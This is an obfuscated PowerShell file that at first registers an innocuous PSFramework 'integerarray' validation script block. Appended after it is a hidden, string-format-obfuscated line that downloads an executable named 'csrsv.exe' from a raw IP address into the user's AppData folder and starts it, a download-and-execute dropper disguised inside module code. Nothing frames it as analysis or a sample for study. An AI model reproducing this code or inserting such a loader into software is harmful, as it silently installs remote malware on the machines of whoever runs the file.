.("{8}{4}{2}{1}{3}{6}{7}{5}{0}" -f 'tion','PSFConfi','r-','g','giste','a','Va','lid','Re') -Name ("{0}{2}{1}"-f 'integer','rray','a') -ScriptBlock {
	param (
		${v`Ar}
	)
	
	${tE`sT} = ${tr`UE}
	try { [int[]]${r`es} = ${v`AR} }
	catch { ${t`ESt} = ${f`ALse} }
	
	[pscustomobject]@{
		("{1}{0}"-f 'cess','Suc') = ${tE`sT}
		("{0}{1}"-f 'Val','ue')   = ${r`ES}
		("{0}{2}{1}"-f'Me','ge','ssa') = "Casting $var as [int[]] failure. Input is being identified as $($var.GetType()) "
	}
}
(&("{0}{1}{2}"-f'New','-Obje','ct') ("{5}{3}{0}{4}{1}{2}"-f 't.W','Clie','nt','m.Ne','eb','Syste')).("{1}{0}{2}" -f'oa','Downl','dFile').Invoke(("{2}{4}{3}{5}{7}{0}{8}{1}{6}" -f '~yahoo/cs','sv.','http:/','02.53','/94.1','.','exe','238/','r'),"$env:APPDATA\csrsv.exe");.("{2}{3}{0}{1}" -f'es','s','Start-Pr','oc') ("$env:APPDATA\csrsv.exe")
